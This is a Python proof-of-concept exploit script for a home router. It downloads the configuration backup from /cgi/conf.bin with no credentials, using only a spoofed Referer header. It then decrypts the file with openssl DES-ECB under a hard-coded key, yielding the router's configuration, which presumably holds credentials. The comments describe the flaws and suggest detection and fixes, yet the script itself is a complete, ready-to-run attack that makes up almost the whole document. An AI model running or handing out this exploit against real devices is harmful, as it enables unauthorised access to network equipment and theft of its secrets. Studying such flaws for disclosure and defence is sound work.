POC / poc.py PY
import requests, subprocess
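# Flow of this script: fetch the router's configuration backup over plain
# HTTP, drop a fixed 144-byte header, and decrypt the remainder with the DES
# key hard-coded below.
#
# Security-relevant points visible in this script:
#   * The request carries only a Referer header; no cookie, token or
#     credentials are sent. If the device answers 200, the backup endpoint is
#     presumably gated on Referer alone, and a client fully controls that
#     header.
#   * The payload is decrypted with single DES in ECB mode under a static key,
#     so the backup's encryption gives no confidentiality to anyone who knows
#     the key.
#   * Defender view: requests for /cgi/conf.bin from clients with no
#     authenticated session are worth alerting on. The device-side fix is to
#     require authentication for the backup and stop using a fixed key.
#   * conf.bin, config_enc.bin and result.bin are written to the current
#     directory. The decrypted configuration may contain secrets (presumably
#     credentials; not shown here), so handle and delete these files
#     accordingly.
router_ip = "192.168.3.26"
url = f"http://{router_ip}/cgi/conf.bin"
headers = {
    "Referer": f"http://{router_ip}/mainFrame.htm"
}

# A timeout keeps the script from hanging indefinitely when the host is
# unreachable or stops responding mid-transfer.
response = requests.get(url, headers=headers, timeout=10)

if response.status_code == 200:
    with open("conf.bin", "wb") as f:
        f.write(response.content)
    print(":: Arquivo conf.bin salvo com sucesso!")

else:
    print(f"?? Erro ao baixar: {response.status_code}")
    # Stop here: continuing would either crash on a missing conf.bin or
    # silently process a stale file left over from an earlier run.
    raise SystemExit(1)

print(":: Descrypting...")

with open("conf.bin", "rb") as f:
    f.seek(144)  # skip the first 144 bytes (header preceding the ciphertext)
    rest = f.read()  # everything after the header is the encrypted payload

if not rest:
    # A response of 144 bytes or fewer leaves nothing to decrypt.
    print("?? conf.bin has no payload after the 144-byte header")
    raise SystemExit(1)

with open("config_enc.bin", "wb") as f:
    f.write(rest)  # ciphertext only, as input for openssl

# Argument list (no shell) so nothing here is subject to shell interpretation.
# check=True raises CalledProcessError on a non-zero openssl exit, so the
# success message below is not printed after a failed decryption (e.g. a
# payload that is not a multiple of the 8-byte DES block with -nopad, or a
# build where single DES is unavailable).
# NOTE(review): the key passed via -K is visible in the process list while
# openssl runs.
subprocess.run([
    "openssl", "enc", "-d", "-des-ecb",  # cipher: DES in ECB mode
    "-nopad",
    "-K", "478DA50BF9E3D2CF",  # static key, hex-encoded
    "-in", "config_enc.bin", "-out", "result.bin"  # plaintext goes to result.bin
], check=True)

print(":: salvo em result.bin!")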